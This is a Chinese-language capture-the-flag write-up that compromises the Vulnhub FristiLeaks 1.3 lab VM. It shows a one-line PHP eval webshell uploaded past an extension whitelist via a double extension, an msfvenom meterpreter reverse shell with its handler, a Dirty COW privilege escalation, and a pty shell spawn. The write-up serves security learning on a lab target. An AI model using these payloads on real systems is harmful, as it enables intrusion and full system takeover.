Vulnhub靶机 FristiLeaks 1.3 write up

admin 安全

FristiLeaks 1.3write up

0x00 靶场搭建

  • 靶机下载

      https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova

  • 靶机配置
    VM搭建

网络设为nat
按作者要求将网卡mac地址 设为

	08:00:27:A5:A6:76

在这里插入图片描述

开机就会显现出IP

在这里插入图片描述

  • 攻击机
    kali
    win10

0x01 信息收集

ip探测

netdiscover -i eth0 -r 192.168.157.0/24

端口服务识别

masscan --rate=1000 -p 1-65535 192.168.157.163

在这里插入图片描述

nmap -sC -sV -A -p 80 192.168.157.163 -o port.txt

开放的端口
只开放了 80
80/tcp open http Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)

0x02 漏洞挖掘

web渗透思路

(1)页面枚举,查看各个页面功能点。
(2)手注+工具AWVS、APPscan、xray测试。
有cms的话 直接搜索cms对应版本漏洞利用。

步骤一:浏览网页,爆破目录

(1)看主页功能点,源码,robots.txt 没有什么头绪
(2)用kali dirsearch win10 御剑 爆破目录。
爆破出 /images/ robots.txt 没有发现利用点
(3) 既然只开放了80端口 ,就肯定从web方面拿shell,说明 字典不够强大。尝试利用靶机名字 或者网页中的字符 作为 字典 枚举目录。
出现 /fristi

欢迎来到管理员门户网站

在这里插入图片描述

步骤二:测试登录框

先手动 尝试 万能密码 报错 没有成功
上sqlmap
也显示不存在注入 先放弃登录框

步骤三:ctrl+u 查看源码

我们需要清理干净这些为了上线后。
为了测试更容易,我在这里留下一些东西。
在这里插入图片描述
下边有base64 编码
在这里插入图片描述
在这里插入图片描述

步骤三:kali base64解码

(1)用burp 解密后发现是png开头的图片,但是不能拷贝到txt中 转换为 png打开。

(2)用kali 自带的base64 命令 解码 保存到 png文件中

先将 base64 编码后的 字符 存储到 txt文件中

然后

base64 -d base64.txt > base64_d.png

再打开文件管理器 图片位置 双击打开

在这里插入图片描述

应该是 密码 keKkeKKeKKeKkEkkEk

而用户名 猜想 应该是 留下这串“后门”的人

在这里插入图片描述

步骤四:登录后台

用户名 为 eezeepz
密码 keKkeKKeKKeKkEkkEk

登录成功

直接就 显示出一个上传文件的功能 好直接。

在这里插入图片描述

步骤五:尝试上传php马

(1)尝试上传1.php文件

<?php eval($_REQUEST[1]); ?>

果然 有限制 白名单验证 只允许上传 png,jpg,gif格式
在这里插入图片描述
(2) 想办法绕过

整合信息收集结果

Apache httpd 2.2.15
CentOS
PHP/5.3.3

先尝试 apache 的多后缀解析 (虽然忘记影响的具体版本啦)
(3)上传抓包 将文件名修改为 webshell.php.jpg

在这里插入图片描述
?? 直接就上传成功啦 没有显示文件名,只显示了 位置
(4)尝试以原文件名访问 上传后的文件

http://192.168.157.163/fristi/uploads/webshell.php.jpg

在这里插入图片描述
访问成功。

步骤六:蚁剑 连接webshell

连接成功。
在这里插入图片描述

步骤七:上个msf马吧(直接反弹shell 也可以)

可以ping 通外网

ping 192.168.157.137 > 1.txt

在这里插入图片描述

(1)msf生成exe反向连接的木马

  msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.157.137 LPORT=4444 -f elf > shell.elf

(2)启动监听

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp 
set LHOST 192.168.157.137
set LPORT 4444
run

在这里插入图片描述

(3)用蚁剑上传木马到 靶机,并执行

在这里插入图片描述
在这里插入图片描述
(4)反弹shell成功
在这里插入图片描述

0x03 提权

步骤八:提权

(1) 用linux-exploit-suggester.sh工具 寻找内核漏洞

uname -a  收集内核信息

在这里插入图片描述

(2)查看提权建议

./linux-exploit-suggester.sh -u "Linux localhost.localdomain 2.6.32-573.8.1.el6.x86_64 #1 SMP Tue Nov 10 18:01:38 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux"

(3)脏牛漏洞尝试

在这里插入图片描述
(4) 搜索dirty cow

searchsploit   dirty cow

这里使用40839
在这里插入图片描述

(5)下载脚本

searchsploit -m 40839

(6)msf上传到靶机/tmp目录

upload 40839.c /tmp

在这里插入图片描述

(6)编译运行

gcc -pthread 40839.c -o exp -lcrypt

执行 ./exp (密码 随意起)
./exp yuan
在这里插入图片描述

成功
在这里插入图片描述
(7) su firefart

在这里插入图片描述
报错 必须在终端运行

(8)python 启动终端 提权成功

python -c 'import pty;pty.spawn("/bin/bash")'
su firefart
yuan

在这里插入图片描述

0x04 总结

该靶机难度一般,
寻找后台废了点时间,通过结合 靶机名字 网页 关键信息 猜出来。
又通过开发为了方便在源码中留下的登录信息,获取密码,通过留下的用户名获取用户名登录后台。
文件上传 通过apache 多后缀解析绕过白名单。
提权 脏牛漏洞。

本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
THE END
分享
二维码
< <上一篇
下一篇>>